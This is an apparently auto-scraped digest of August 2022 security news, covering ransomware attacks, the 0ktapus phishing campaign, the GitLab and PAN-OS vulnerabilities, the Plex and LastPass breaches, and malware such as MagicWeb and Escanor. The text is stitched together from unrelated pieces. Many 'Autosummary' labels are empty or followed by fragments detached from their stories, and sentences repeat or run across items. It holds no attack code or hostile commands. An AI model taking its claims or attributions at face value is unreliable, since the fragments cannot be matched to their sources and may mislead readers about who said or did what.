Hackers have created a fake "Cthulhu World" play-to-earn community, including websites, Discord groups, social accounts, and a Medium developer site, to distribute the Raccoon Stealer, AsyncRAT, and RedLine password-stealing malware infections on unsuspecting victims. "Alteryx announced Alteryx Server-FIPS, a version of its Server offering that is aligned with the Federal Information Processing Standards (FIPS) for data security and computer systems. The launch of Server-FIPS is monumental for the use of analytics in public sector environments that require enhanced data encryption. Alteryx Server-FIPS is a FIPS-capable and scalable server-based product for scheduling, sharing, and running apps and models created in Alteryx Designer-FIPS for others in the organization to leverage. This … More
The post Alteryx Server-FIPS enables users to scale analytics initiatives across public sector agencies appeared first on Help Net Security.
"Autosummary:
"Veracode released data revealing that the financial services industry ranks among the best for overall flaw percentage when compared to other industries, but has one of the lowest fix rates for software security flaws. The sector also falls to the middle of the pack for high-severity flaws, with 18 percent of applications containing a serious vulnerability, suggesting financial firms should prioritize identifying and remediating the flaws that matter most. The findings were outlined in the … More
The post How fast is the financial industry fixing its software security flaws? appeared first on Help Net Security.
"Autosummary:
Although the finance sector outperforms most other industries in fix times for flaws discovered by dynamic, SCA, and static, the study found there is still ample room for continued improvement when looking at the number of days it takes to resolve 50 percent of flaws—116 days for dynamic analysis, 385 days for SCA, and 288 days for static analysis. "The threat actors behind Twilio and Cloudflare attacks have been linked to a phishing campaign that targeted other 136 organizations. The threat actors behind the attacks on Twilio and Cloudflare have been linked to a large-scale phishing campaign that targeted 136 organizations, security firm Group-IB reported. Most of the victims are organizations providing IT, software development, and cloud services. The campaign, codenamed 0ktapus, […]
The post 0ktapus phishing campaign: Twilio hackers targeted other 136 organizations appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
SysAid is an excellent initial access vector in that sense, as it still incorporates Log4j, and numerous organizations use it as an IT management tool, service desk, and help desk solution. "Autosummary:
“It is likely that the threat actors that were undergoing structural changes,” the authors of the report speculated, “and have begun settling into their new modes of operating, resulting in their total compromises increasing in conjunction.” "As another hospital falls victim to ransomware, Tony weighs in on the much-debated issue of banning ransomware payouts
The post French hospital crippled by cyberattack – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"An Iran-linked Mercury APT group exploited the Log4Shell vulnerability in SysAid applications for initial access to the targeted organizations. The Log4Shell flaw (CVE-2021-44228) made the headlines in December after Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library. The flaw can be exploited […]
The post Iran-linked Mercury APT exploited Log4Shell in SysAid Apps for initial access appeared first on Security Affairs.
"Autosummary:
The threat actor used different methods to communicate with their C2 server, including built-in operating system tools such as PowerShell, a tunneling tool called vpnui.exe, a unique version of the open-source tool Ligolo, and a remote monitoring and management software called eHorus. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @VK_Intel, @LawrenceAbrams, @jorntvdw, @billtoulas, @demonslay335, @PolarToffee, @Ionut_Ilascu, @Seifreed, @fwosar, @DanielGallagher, @struppigel, @BleepinComputer, @malwareforme, @serghei, @FourOctets, @malwrhunterteam, @TrendMicro, @GossiTheDog, @AlvieriD, @ValeryMarchive, @Cyberknow20, @VenezuelaBTH, @S0ufi4n3, @vxunderground, @AShukuhi, @pcrisk, and @ddd1ms. According to our information, the investigators in charge of the cyberattack that led to the outbreak of the LockBit ransomware, last weekend, at the Sud-Francilien hospital center (CHSF), in Corbeil-Essonnes , currently suspect that the hijacking of a publisher"s support account served as the initial intrusion vector. "Autosummary:
Other companies targeted in the attack include Coinbase, KuCoin, Binance, Microsoft, Telus, Verizon Wireless, T-Mobile, AT&T, Sprint, Rogers, Mailgun, Slack, Box, SendGrid, Yahoo, Sykes, BestBuy, and Infosys. "Autosummary:
The versions that address the problem are 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2, and 8.3.1. "Autosummary:
"Avast has launched a Ransomware Shield for businesses, offering organizations an extra layer of protection against ransomware attacks. This will ensure businesses can secure their files and customer data, with proactive protection which prevents unauthorized access. The new feature is available as part of the Avast Essential, Premium, and Ultimate Business Security packages for businesses for both Windows and MacOS. Despite observing a decline in ransomware attacks in Q4 2021 and Q1 2022, ransomware attacks … More
The post Avast Ransomware Shield for businesses prevents unauthorised access appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video, David Mahdi, Chief Strategy Officer & CISO Advisory at Sectigo, talks about how ransomware isn’t solely a malware problem, bad actors want access to your data, so it really is a data security and access problem. When we look at what ransomware does, it leverages users’ access within an organization to encrypt sensitive files (and often also steal). The authentication given to a user defines the level of damage … More
The post We need to think about ransomware differently appeared first on Help Net Security.
"Autosummary:
"Acronis researchers have concluded that ransomware continues to be the number one threat to large and medium-sized businesses, including government organizations. Nearly half of all reported breaches during the first half of 2022 involved stolen credentials, which enable phishing and ransomware campaigns. Findings underscore the need for more holistic approaches to cybersecurity. To extract credentials and other sensitive information, cybercriminals use phishing and malicious emails as their preferred infection vectors. Nearly one percent of all … More
The post Ransomware dominates the threat landscape appeared first on Help Net Security.
"Autosummary:
The current cybersecurity threat landscape requires a multi-layered solution that combines anti- malware, EDR, DLP, email security, vulnerability assessment, patch management, RMM, and backup capabilities all in one place. The business world is increasingly distributed, and in Q2 2022, an average of 8.3% of endpoints tried to access malicious URLs. "66% of organizations have changed their cybersecurity strategy as a direct response to the conflict between Russia and Ukraine, while 64% suspect their organization has been either directly targeted or impacted by a nation-state cyber attack, according to Venafi. Other key findings include: 77% believe we’re in a perpetual state of cyberwar 82% believe geopolitics and cybersecurity are intrinsically linked More than two-thirds (68%) have had more conversations with their board and senior management in … More
The post Organizations changing cyber strategy in response to nation-state attacks appeared first on Help Net Security.
"Autosummary:
Other key findings include: 77% believe we’re in a perpetual state of cyberwar 82% believe geopolitics and cybersecurity are intrinsically linked More than two-thirds (68%) have had more conversations with their board and senior management in response to the Russia/Ukraine conflict 63% doubt they’d ever know if their organization was hacked by a nation-state 64% think the threat of physical war is a greater concern in their country than cyberwar “Cyberwar is here. "Autosummary:
"This malware is untypically large, ~63MB, (possibly in an attempt to evade [antivirus] detection) and has a valid signature (signed on August 23rd, 2022)," Checkmarx researcher Aviad Gershon noted. "PyPI, the official third-party software repository for Python packages, is warning about a phishing campaign targeting its users. “We have additionally determined that some maintainers of legitimate projects have been compromised, and malware published as the latest release for those projects. These releases have been removed from PyPI and the maintainer accounts have been temporarily frozen,” the PyPI team noted. The malicious releases that they are currently aware of are: exotel – v0.1.6 spam – … More
The post Phishing PyPI users: Attackers compromise legitimate projects to push malware appeared first on Help Net Security.
"Autosummary:
PyPI (i.e., the Python Software Foundation, which runs the repository) has recently begun requiring that maintainers of critical projects/packages must have 2FA enabled to publish, update, or modify them, and has distributed 4000 hardware security keys to help them. "Autosummary:
Some of the targeted companies include T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, AT&T, HubSpot, TTEC, and Best Buy. "Autosummary:
" Along with this, the registry admins shared a number of steps one could take to safeguard themselves from such phishing attacks, such as checking the URL of the page before providing their PyPI account credentials: To verify that you’re not entering credentials in a phishing site, confirm that the URL in the address bar is https://t.co/diAe0xWm0R and that the site’s TLS certificate is issued to https://t.co/diAe0xWm0R. Additionally, consider using a browser-integrated password manager. "Autosummary:
"Autosummary:
With billions of dollars in government spending being poured into the security industry, we will almost certainly see security products and cloud services eventually take an exponential leap forward as a direct result of being able to invest more heavily in product development and security research. Beef up your own cybersecurity initiatives, without the price tag CISA offers numerous recommendations for how organizations can improve their overall cybersecurity, but many of these guidelines pertain to passwords. "Autosummary:
Dubbed ‘MagicWeb’, the new malicious tool is an evolution of ‘FoggyWeb’, which allowed hackers to exfiltrate the configuration database of compromised Active Directory Federation Services (ADFS) servers, decrypt token-signing and token-decryption certificates, and fetch additional payloads from the command and control (C2) server. "Autosummary:
Some of the targeted companies include T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, AT&T, HubSpot, TTEC, and Best Buy. "Autosummary:
In the time since, the researchers have discovered “multiple instances of hackers looking to collaborate on exploiting Hikvision cameras using the command injection vulnerability,” specifically in Russian dark web forums, where leaked credentials have been put up for sale. "Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked NOBELIUM APT group to maintain persistent access to compromised environments. The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that […]
The post Nobelium APT uses new Post-Compromise malware MagicWeb appeared first on Security Affairs.
"Autosummary:
The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that conducted the supply chain attack against SolarWinds, which involved multiple families of implants, including the SUNBURST backdoor, TEARDROP malware, GoldMax malware, Sibot, and GoldFinder backdoors. "Autosummary:
Its function is to profile the victim by checking ProgramFiles folder paths, AV name, username, OS version, MS Office version, .NET framework version, and more. "Categories: Threat Intelligence September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri. This is combined with heavy detections of unseen malware, identified through our AI engine, spiking in May as well as September 2021. |
The post Exploits and TrickBot disrupt manufacturing operations appeared first on Malwarebytes Labs.
"Autosummary:
Posted: August 25, 2022 by September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri. September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri.For example, the video card maker NVIDIA dealt with a significant attack in February 2022; March saw the infection of the tool manufacturer Snap-On Tools by Conti ransomware; in April there was an operation against General Motors; and in May, infiltration of the agricultural company, AGCO. "Categories: Exploits and vulnerabilities Categories: News Tags: GitLab Tags: RCE Tags: CVE-2022-2884 Tags: GitHub Tags: import GitLab has released important security fixes to patch for an RCE vulnerability, known as CVE-2022-2884. |
The post Update now! GitLab issues critical security release for RCE vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
Disable GitHub import Login using an administrator account to your GitLab installation and perform the following: Click "Menu" -> "Admin". "IronNet announced that a major European logistics company, offering courier, package delivery and express mail service, will deploy the IronNet Collective DefenseSM platform to help defend against increased cyber threats facing the sector. The logistics company is remaining anonymous to help protect its operational security. It serves millions of customers across Europe, provides pick-up and drop-off points for package and parcel services as well as door-to-door courier and fulfillment services for e-merchants. “Cyber attacks along … More
The post A major European logistics company selects IronNet to improve its operational security appeared first on Help Net Security.
"Autosummary:
The security platform will enable the logistics company to leverage NDR capabilities, powered by behavioral analytics, to detect unknown threats on its network and, in turn, anonymously in real-time exchange visibility with others in the Collective Defense community. "Password management software firm LastPass has suffered a data breach, threat actors have stole source code and other data. Password management software firm LastPass disclosed a security breach, threat actors had access to portions of the company development environment through a single compromised developer account and stole portions of source code and some proprietary technical […]
The post LastPass data breach: threat actors stole a portion of source code appeared first on Security Affairs.
"Autosummary:
"Data Dynamics released StorageX9.0, expanding and enhancing the existing product functionalities to help customers manage sprawls of unstructured data and its complexities. It enables enterprises to categorize & analyze their data, draw actionable insights, apply security practices, maintain compliance, and enhance business performance. StorageX 9.0 is power packed with new features, including Share and DFS analytics, NFSv4 and NFSv3 POSIX security translation, and support for versioned object mobility. “StorageX 9.0 is an enhancement to our … More
The post Data Dynamics StorageX9.0 helps customers manage sprawls of unstructured data appeared first on Help Net Security.
"Autosummary:
"Giant Oak has updated their GOST product. The Fall 2022 GOST Release introduces three primary updates: increase in precision of alerts; modular management of customized models; and expanded access to GOSTCrawl, a proprietary data source that increases the customer’s risk discovery. The new GOST updates reduce analyst labor by 50% while increasing the accuracy and agility of results. The combined improvements allow GOST users to monitor large populations more efficiently and effectively than other risk … More
The post Giant Oak GOST updates empower users to identify money laundering and other illicit activities appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video, Otavio Freire, President and CTO at SafeGuard Cyber, offers insight on new social engineering tactics discovered in the wild, and illustrates how phishing attacks are changing, including how they’re evolving beyond email.
The post New social engineering tactics discovered in the wild appeared first on Help Net Security.
"Autosummary:
"Nearly half of enterprises have fallen victim to a ransomware attack, of which nearly all have had little choice but to heed their attackers, according to the Q2 CISO Circuit report from YL Ventures. The financial disruption, privacy implications and operational failure danger caused by ransomware are often too critical to suffer. This is especially true in cases involving critical infrastructure, including water treatment and hospital networks. For now, CISOs see little need for a … More
The post CISOs see little need for a point solution to cover ransomware risk appeared first on Help Net Security.
"Autosummary:
"GitLab has fixed a remote code execution vulnerability (CVE-2022-2884) affecting the Community and the Enterprise Edition of its DevOps platform, and has urged admins to upgrade their GitLab instances immediately. The vulnerability was reported through the company’s bug bounty program and there is no mention of it being actively exploited in the wild. About CVE-2022-2884 CVE-2022-2884 is a critical severity issue that may allow an authenticated user to achieve remote code execution via the Import … More
The post Critical RCE bug in GitLab patched, update ASAP! (CVE-2022-2884) appeared first on Help Net Security.
"Autosummary:
"A French hospital, the Center Hospitalier Sud Francilien (CHSF), suffered a cyberattack on Sunday and was forced to refer patients to other structures. The Center Hospitalier Sud Francilien (CHSF), a hospital southeast of Paris, has suffered a ransomware attack over the weekend. The attack disrupted the emergency services and surgeries and forced the hospital to refer patients […]
The post France hospital Center Hospitalier Sud Francilien suffered ransomware attack appeared first on Security Affairs.
"Autosummary:
The announcement states that the attack does not impact the operation and security of the hospital building, and all networks remain in operation (telephone with the exception of fax, automated distribution flows, etc.). "Autosummary:
"Even though all account passwords that could have been accessed were hashed and secured in accordance with best practices, out of an abundance of caution, we are requiring all Plex accounts to have their password reset," claims Plex"s notice. "Autosummary:
"The infected computer could be used to pilfer social media or banking credentials, detonate ransomware, or even entrap the victim into a nefarious "slave" network, extort the computer owner, and violate their privacy — all depending on what the attackers decide to do with the compromised device," Martin said. "Autosummary:
On August 15, 2022, BRP provided an update on the situation, saying that four manufacturing sites in Canada, Finland, the U.S., and Austria resumed production, with the rest to follow suit by the end of that week. "Autosummary:
Attackers adding the phone as a new MFA device (Mitiga) Because valid sessions can expire or be revoked, the threat actors add a new MFA device and link it to the breached Microsoft 365 account, a move that doesn"t generate any alerts or require further interaction with the original account owner. "The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign now target Google G Suite users The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services were spotted targeting Google G Suite users. In AiTM phishing, threat actors set up a proxy server between a target user and the website the user […]
The post AiTM phishing campaign also targets G Suite users appeared first on Security Affairs.
"Autosummary:
The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign now target Google G Suite users The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services were spotted targeting Google G Suite users. "Autosummary:
Quantum ransom note Source: BleepingComputer Quantum is becoming a major player among enterprise-targeting ransomware operations, linked to an attack on PFC that impacted over 650 healthcare orgs The ransomware gang is believed to have become an offshoot of the Conti ransomware operation, which took over the previous rebrand of the MountLocker ransomware operation. "Autosummary:
To apply the workaround, following these steps: Log in using an administrator account to your GitLab installation Click "Menu" -> "Admin" Click "Settings" -> "General" Expand the "Visibility and access controls" tab Under "Import sources" disable the "GitHub" option Click "Save changes" To verify that the workaround has been correctly implemented, follow these steps: In a browser window, login as any user. "Cloud Range has introduced a cognitive assessment to help security and HR leaders optimize the cybersecurity hiring process and make the right hiring choice. The Cloud Range RightTrak Cyber Aptitude Assessment is a metric-based assessment with different cognitive components that identify an individual’s cognitive aptitude for a career in cybersecurity. It matches their innate talents and abilities with their optimal cyber work role. “Unfortunately, security leaders and HR professionals are challenged by finding the right … More
The post Cloud Range RightTrak Cyber Aptitude Assessment improves cybersecurity hiring process appeared first on Help Net Security.
"Autosummary:
While Gartner reports validate a skills shortage, there are many alternative mechanisms to fill this gap,” write Richard Addiscott, senior director analyst at Gartner, and Sam Olyaei, vice president and team manager at Gartner. "Categories: News Tags: Microsoft Tags: ChromeOS Tags: Chrome Tags: Google Tags: audio Tags: bluetooth Tags: exploit Tags: vulnerability Microsoft has released a report detailing a ChromeOS vulnerability reported to Chrome and fixed within a week. |
The post ChromeOS vulnerability found by Microsoft appeared first on Malwarebytes Labs.
"Autosummary:
Changes to audio metadata could trigger the vulnerability in just the way they were looking for: From the browser: The browser’s media component invokes the function when metadata is changed, such as when playing a new song in the browser. A critical issue The problem, known as CVE-2022-2587 on the Common Vulnerabilities and Exposures (CVE) list, caused big headaches for Chrome. "Categories: News Tags: Plex Tags: breach Tags: sign out Tags: change password Tags: Troy Hunt Tags: HaveIBeenPwnd In an email sent to its users, Plex revealed that a cybercriminal accessed a limited subset of customer data, including emails and encrypted passwords. |
The post Reset your password now! Plex suffers data breach appeared first on Malwarebytes Labs.
"Autosummary:
Posted: August 24, 2022 by In an email sent to its users, Plex revealed that a cybercriminal accessed a limited subset of customer data, including emails and encrypted passwords. "Malwarebytes announced a new integration with Revelstoke, the first next-generation Security Orchestration, Automation and Response (SOAR) platform. The partnership will help customers better automate and address priority vulnerabilities with the greatest potential impact to their organizations. The partnership comes at a critical time in the cybersecurity landscape, as security teams are feeling the double strain of increased threat volume and limited resources. Malwarebytes’ 2022 Threat Review documented a steep “Covid bounce” in malware volume. Revelstoke’s … More
The post Malwarebytes partners with Revelstoke to automate endpoint detection and response appeared first on Help Net Security.
"Autosummary:
"The streaming media platform Plex is urging its users to reset passwords after threat actors gained access to its database. Plex is an American streaming media service and a client–server media player platform. The company disclosed a data breach after threat actors have access to a limited subset of data stored in a compromised database. Exposed data includes emails, usernames, and […]
The post Plex discloses data breach and urges password reset appeared first on Security Affairs.
"Autosummary:
Plex did share technical details about the security breach, below is the Plex data breach notification: We want you to be aware of an incident involving your Plex account information yesterday. "LockBit ransomware gang claims to have hacked the IT giant Entrust and started leaking the stolen files. Entrust Corp., provides software and hardware used to issue financial cards, e-passport production, user authentication for those looking to access secure networks or conduct financial transactions, trust certificated for websites, mobile credentials, and connected devices. The Lockbit ransomware […]
The post Lockbit leak sites hit by mysterious DDoS attack after Entrust hack appeared first on Security Affairs.
"Autosummary:
Lockbit: "We"re being DDoS"d because of the Entrust hack" vx-underground: "How do you know it"s because of the Entrust breach?" Lockbit: pic.twitter.com/HUO2hdTbwz — vx-underground (@vxunderground) August 21, 2022 The news was confirmed by BleepingComputer who reached representatives from the group: “Ddos attack began immediately after the publication of data and negotiations, of course it was them, who else needs it? "There are two main types of malware analysis: static and dynamic. Performing static analysis of a malicious binary means concentrating on analyizing its code without executing it. This type of analysis may reveal to malware analysts not only what the malware does, but also its developer’s future intentions (e.g., currently unfinished functionalities). Dynamic analysis looks at the behavior of the malware when it’s run – usually in a virtual sandbox. This type of analysis should … More
The post 7 open-source malware analysis tools you should try out appeared first on Help Net Security.
"Autosummary:
Mobile Security Framework (MobSF) MobSF is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis, and security assessment framework capable of performing static and dynamic analysis.Capabilities include disassembly, assembly, decompilation, graphing, and scripting, along with hundreds of other features. "In this Help Net Security video, Kevin Holvoet, Cyber Threat Intelligence Instructor, SANS Institute, discusses ransomware and Ransomware as a Service (Raas) attacks, and illustrates how preparedness with a proper top-down response is critical for business continuity in case of an attack.
The post What businesses can do to anticipate and mitigate ransomware threats appeared first on Help Net Security.
"Autosummary:
"Radware released a report revealing that the number of malicious DDoS attacks climbed by 203% compared to the first six months of 2021. The report also underscores how Russia’s invasion of Ukraine has altered the focus of the threat landscape — shifting it from the consequences of the pandemic to a ground swell of DDoS activity launched by patriotic hacktivists. “The threat landscape saw a marked shift in the first half of 2022,” said Pascal … More
The post DDoS attacks jump 203%, patriotic hacktivism surges appeared first on Help Net Security.
"Autosummary:
Major information and communication networks in the Philippines, including CNN, news network ABS-CBN, Rappler, and VERA Files, were the target of DDoS attacks in connection with the country’s 2022 general elections. Retail and high-tech top industries for most web attacks During the first six months of 2022, there was an increase in malicious transactions targeting online applications, dominated by predictable resource location and injection attacks. "Autosummary:
"Abnormal Security released a report which explores the current email threat landscape. This Help Net Security video provides insight into the latest advanced email attack trends.
The post Credential phishing attacks rise and represent a huge threat to businesses appeared first on Help Net Security.
"Autosummary:
"US Cybersecurity and Infrastructure Security Agency (CISA) added a flaw, tracked as CVE-2022-0028, affecting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity flaw impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. According to Binding Operational […]
The post CISA adds Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
US Cybersecurity and Infrastructure Security Agency (CISA) added a flaw, tracked as CVE-2022-0028, affecting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity flaw impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The issue, tracked as CVE-2022-0028 (CVSS score: 8.6), is a URL filtering policy misconfiguration that could be exploited by an unauthenticated, remote attacker to carry out reflected and amplified TCP denial-of-service (DoS) attacks. "Autosummary:
Earlier this year, incidents at Nvidia, Microsoft, and several other companies have highlighted how big of a problem it"s become – and how, for some organizations, it may be a threat that"s even bigger than ransomware. After so many years of alarming headlines, most organizations have deployed ransomware protection in the form of better backup strategies, more fine-tuned and granular data access, and better rules and monitoring for detecting unwanted file changes. Staying quietly, rather than flashing "you"ve been hacked" messages on computer screens, allows attackers to "see" more information flows in the network and to do more in-depth reconnaissance of systems after gaining entry. "Autosummary:
PAN-OS versions vulnerable to attack, with patches available, include PAN-OS prior to 10.2.2-h2, PAN-OS prior to 10.1.6-h6, PAN-OS prior to 10.0.11-h1, PAN-OS prior to 9.1.14-h4, PAN-OS prior to 9.0.16-h3 and PAN-OS prior to 8.1.23-h1.The DoS attack would appear to originate from a Palo Alto Networks PA-Series (hardware), VM-Series (virtual) and CN-Series (container) firewall against an attacker-specified target.” "Autosummary:
"Autosummary:
Donut Leaks data leak site Source: BleepingComputer The stolen data storage server runs the File Browser application, which allows visitors to browse through all of the stolen data stored on the server, broken down by the victim. "Autosummary:
"Autosummary:
The threat actor is also known to use a custom AppleScript ("listing.applescript") to determine "how up-to-date the victim is with Apple"s XProtect and MRT malware removal tool, presumably all the better to target them with more effective payloads," the researchers said. "DevOps platform GitLab fixed a critical remote code execution flaw in its GitLab Community Edition (CE) and Enterprise Edition (EE) releases. DevOps platform GitLab has released security updates to fix a critical remote code execution vulnerability, tracked as CVE-2022-2884 (CVSS 9.9), affecting its GitLab Community Edition (CE) and Enterprise Edition (EE) releases. An authenticated attacker […]
The post GitLab fixed a critical Remote Code Execution (RCE) bug in CE and EE releases appeared first on Security Affairs.
"Autosummary:
"Autosummary:
In 2021, Cyren reported about the rampant abuse of "typeform.com" for phishing, an older report from Trend Micro mentioned "123formbuilder.com", "formtools.com", and "smartsurvey.co.uk", while Cofense highlighted the abuse of "Canva.com". "Rippleshot has partnered with Flashpoint, to pair Rippleshot’s compromised and high-risk merchant data and insights with Flashpoint’s Payment and Credit Card Fraud Mitigation solution. Equipped with tools such as AI/ML, automation, and data-driven strategies, Rippleshot’s cloud-based solution leverages a data consortium of more than 4,500 financial institutions and is updated daily. Using Rippleshot’s detailed data and solutions, financial institutions can enhance their existing fraud prevention strategies to detect compromised cards, data breaches and high-risk merchants, … More
The post Rippleshot collaborates with Flashpoint to combat card fraud for financial institutions appeared first on Help Net Security.
"Autosummary:
"The Cybersecurity Tech Accord is a global interindustry agreement and partnership of leading cybersecurity and technology vendors that are jointly building a better future in cyberspace. Some vendors and experts referred to it as a nascent version of Geneva Cybersecurity Convention. The signatories of the Tech Accord strive to protect all their customers in the best possible manner, to progressively help their customers fortify their cyber resilience and cyber defense capabilities, to shield innocent citizens … More
The post ImmuniWeb joins Cybersecurity Tech Accord to improve cyber resilience for customers appeared first on Help Net Security.
"Autosummary:
We will design, develop, and deliver products and services that prioritize security, privacy, integrity and reliability, and in turn reduce the likelihood, frequency, exploitability, and severity of vulnerabilities. "Autosummary:
Malicious high-ranking search results (Zscaler) The software used for luring victims in the ongoing campaigns, according to Zscaler that discovered them, includes the following: Adobe Acrobat Pro 3DMark 3DVista Virtual Tour Pro 7-Data Recovery Suite MAGIX Sound Force Pro Wondershare Dr. Fone "Fortinet announced the latest semiannual FortiGuard Labs Global Threat Landscape Report which revealed that ransomware threat continues to adapt with more variants enabled by Ransomware-as-a-Service (RaaS). Additional highlights of the report: Work-from-anywhere (WFA) endpoints remain targets for cyber adversaries to gain access to corporate networks. Operational technology (OT) and information technology (IT) environments are both attractive targets as cyber adversaries search for opportunities in the growing attack surface and IT/OT convergence. Destructive threat trends continue … More
The post Disk wiping malware knows no borders appeared first on Help Net Security.
"Autosummary:
AI and ML-powered prevention, detection, and response strategies based on a cybersecurity mesh architecture allow for much tighter integration, increased automation, as well as a more rapid, coordinated, and effective response to threats across the extended network. “To combat advanced and sophisticated attacks, organizations need integrated security solutions that can ingest real-time threat intelligence, detect threat patterns, and correlate massive amounts of data to detect anomalies and automatically initiate a coordinated response across hybrid networks.”For example, a spoofing vulnerability (CVE 2022-26925) placed high in volume, as well as a remote code execution (RCE) vulnerability (CVE 2022-26937). "Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, identified a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor. The threat actors offer Android-based and PC-based versions of RAT, along with HVNC module and exploit builder to weaponize Microsoft Office and Adobe PDF documents to deliver malicious code. The tool has been released for sale on January 26th this year initially as a compact HVNC implant allowing to set … More
The post Escanor malware delivered in weaponized Microsoft Office documents appeared first on Help Net Security.
"Autosummary:
"Businesses are increasingly concerned about how they will meet ransomware demands. Only 19 percent of those surveyed have ransomware coverage limits above $600,000, while over half (59 percent) hoped the government would cover damages when future attacks are linked to other nation-states, according to BlackBerry Limited and Corvus Insurance. This Help Net Security video uncovers why businesses look for government help with ransomware demand costs.
The post Businesses expect the government to increase its financial assistance for all ransomware incidents appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Researchers spotted a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, identified a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor. The threat actors offer Android-based and PC-based versions of RAT, along with HVNC module […]
The post Escanor Malware delivered in Weaponized Microsoft Office Documents appeared first on Security Affairs.
"Autosummary:
The majority of victims infected by Escanor have been identified in the U.S., Canada, UAE, Saudi Arabia, Kuwait, Bahrain, Egypt, Israel, Mexico, and Singapore with some infections in South-East Asia. "The Donot Team threat actor, aka APT-C-35, has added new capabilities to its Jaca Windows malware framework. The Donot Team has been active since 2016, it focuses on government and military organizations, ministries of foreign affairs, and embassies in India, Pakistan, Sri Lanka, Bangladesh, and other South Asian countries. In October 2021, a report released by the Amnesty International revealed that the […]
The post Donot Team cyberespionage group updates its Windows malware framework appeared first on Security Affairs.
"Autosummary:
The Donot Team has been active since 2016, it focuses on government and military organizations, ministries of foreign affairs, and embassies in India, Pakistan, Sri Lanka, Bangladesh, and other South Asian countries. "Autosummary:
Alleged Entrust data leaked on LockBit"s data leak site Source: Dominic Alvieri Soon after they started leaking data, researchers began reporting that the ransomware gang"s Tor data leak sites were unavailable due to a DDoS attack. So, at this point, it is unclear if Entrust, an affiliated cybersecurity company, or simply a rival threat actor is taking advantage of the situation by conducting the attacks. "Malware peddlers are exploiting users’ familiarity with and inherent trust in DDoS protection pages to make them download and run malware on their computer, Sucuri researchers have warned. Hidden malware and fake DDoS protection DDoS protection pages have become so common that users rarely think twice about doing what those pages tell them to do to get website access. This state of affairs is being eploited by clever malware peddlers. Visitors to WordPress sites that … More
The post Fake DDoS protection pages are delivering malware! appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The upcoming winter is expected to be plagued by shortages, power cuts, rationing, and soaring energy prices, leaving consumers even more vulnerable to ransomware attacks against gas suppliers. "I’m proud to have contributed to the “European Cybersecurity in Context: A Policy-Oriented Comparative Analysis“ Worldwide connectivity has unleashed global digitalisation, creating cross-border social networks for communicating and spreading information. The use of digital identity for democratic procedures is becoming a reality and public services are shifting towards using digital tools to implement simplified procedures. […]
The post European Cybersecurity in Context: A Policy-Oriented Comparative Analysis appeared first on Security Affairs.
"Autosummary:
"Categories: News Categories: Social engineering Scammers subject their victims to a whirlwind of emotions so they can achieve their end goal: money. |
The post Criminals socially engineer their way to bank details with fake arrest warrants appeared first on Malwarebytes Labs.
"Autosummary:
In her post, she broke down the scam into four phases, reflecting the scammers" intent in each stage: Dismay, Isolate, Overwhelm, and Intimidate. The caller, a female who was purportedly working for the Inland Revenue Board of Malaysia (IRBM), an agency responsible for collecting taxes, said that "Venus" owed at least RM50,000 ($11,000) in arrears for a business created under her name.Seems simple enough, but this process, which countries from the West have been abiding by, is the result of countless breaches in the past, followed by a myriad of digital crimes that took advantage of those leaked and stolen data. "Categories: Exploits and vulnerabilities Categories: News CISA updated its catalog of actively exploited vulnerabilities. Make sure you update your software before the due date! |
The post CISA wants you to patch these actively exploited vulnerabilities before September 8 appeared first on Malwarebytes Labs.
"Autosummary:
CVE-2022-32893 and CVE-2022-32894, the two zero-day, out-of-bounds write vulnerabilities affecting iOS, iPadOS, and macOS, continue to headline as of this writing. "Autosummary:
